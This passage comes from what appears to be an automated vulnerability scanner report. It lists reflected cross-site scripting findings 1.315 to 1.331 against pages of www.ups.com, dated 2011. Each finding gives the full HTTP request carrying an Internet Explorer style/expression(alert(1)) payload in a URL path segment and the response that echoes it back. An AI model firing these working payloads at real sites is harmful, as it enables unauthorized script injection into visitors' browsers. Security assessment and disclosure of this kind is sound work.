<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us4eb22"style="x:expression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.315. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea was submitted in the REST URL parameter 3. This input was echoed as 40e6f"style="x:expression(alert(1))"5407b987dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en40e6f"style="x:expression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.316. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a was submitted in the REST URL parameter 2. This input was echoed as 684d5"style="x:expression(alert(1))"735d7daa35a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us684d5"style="x:expression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.317. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a was submitted in the REST URL parameter 3. This input was echoed as f0bf3"style="x:expression(alert(1))"ea82c99023a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enf0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf0bf3"style="x:expression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.318. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8 was submitted in the REST URL parameter 2. This input was echoed as 34efe"style="x:expression(alert(1))"5e7fe6716d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us34efe"style="x:expression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.319. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11694"style%3d"x%3aexpression(alert(1))"b9967f4690e was submitted in the REST URL parameter 3. This input was echoed as 11694"style="x:expression(alert(1))"b9967f4690e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en11694"style%3d"x%3aexpression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en11694"style="x:expression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.320. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7 was submitted in the REST URL parameter 2. This input was echoed as c4ffa"style="x:expression(alert(1))"baeeaabbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7/en/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc4ffa"style="x:expression(alert(1))"baeeaabbf7/en/about/sites.html">
...[SNIP]...

1.321. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b37ff"style%3d"x%3aexpression(alert(1))"31afa948299 was submitted in the REST URL parameter 3. This input was echoed as b37ff"style="x:expression(alert(1))"31afa948299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enb37ff"style%3d"x%3aexpression(alert(1))"31afa948299/about/sites.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44986

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb37ff"style="x:expression(alert(1))"31afa948299/about/sites.html">
...[SNIP]...

1.322. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074 was submitted in the REST URL parameter 2. This input was echoed as 2d8f4"style="x:expression(alert(1))"fcfe492b074 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074/en/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2d8f4"style="x:expression(alert(1))"fcfe492b074/en/contact/index.html">
...[SNIP]...

1.323. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c was submitted in the REST URL parameter 3. This input was echoed as aa5fa"style="x:expression(alert(1))"9d771ad853c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enaa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa5fa"style="x:expression(alert(1))"9d771ad853c/contact/index.html">
...[SNIP]...

1.324. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3 was submitted in the REST URL parameter 2. This input was echoed as 65eef"style="x:expression(alert(1))"422f4a3ffb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3/en/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us65eef"style="x:expression(alert(1))"422f4a3ffb3/en/freight/air_freight.html">
...[SNIP]...

1.325. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf815"style%3d"x%3aexpression(alert(1))"af04c03eaf was submitted in the REST URL parameter 3. This input was echoed as bf815"style="x:expression(alert(1))"af04c03eaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enbf815"style%3d"x%3aexpression(alert(1))"af04c03eaf/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enbf815"style="x:expression(alert(1))"af04c03eaf/freight/air_freight.html">
...[SNIP]...

1.326. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31 was submitted in the REST URL parameter 2. This input was echoed as 38e44"style="x:expression(alert(1))"3c86ba18c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us38e44"style="x:expression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html">
...[SNIP]...

1.327. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7 was submitted in the REST URL parameter 3. This input was echoed as 32303"style="x:expression(alert(1))"4d43a21c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en32303"style="x:expression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html">
...[SNIP]...

1.328. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec17"style%3d"x%3aexpression(alert(1))"a447423ebc1 was submitted in the REST URL parameter 2. This input was echoed as bec17"style="x:expression(alert(1))"a447423ebc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usbec17"style%3d"x%3aexpression(alert(1))"a447423ebc1/en/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbec17"style="x:expression(alert(1))"a447423ebc1/en/freight/expedite.html">
...[SNIP]...

1.329. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538 was submitted in the REST URL parameter 3. This input was echoed as eb98d"style="x:expression(alert(1))"6d07b93d538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/eneb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb98d"style="x:expression(alert(1))"6d07b93d538/freight/expedite.html">
...[SNIP]...

1.330. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bdd"style%3d"x%3aexpression(alert(1))"a19badde730 was submitted in the REST URL parameter 2. This input was echoed as 97bdd"style="x:expression(alert(1))"a19badde730 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us97bdd"style%3d"x%3aexpression(alert(1))"a19badde730/en/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us97bdd"style="x:expression(alert(1))"a19badde730/en/freight/index.html">
...[SNIP]...

1.331. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/freight/index.html

Issue detail

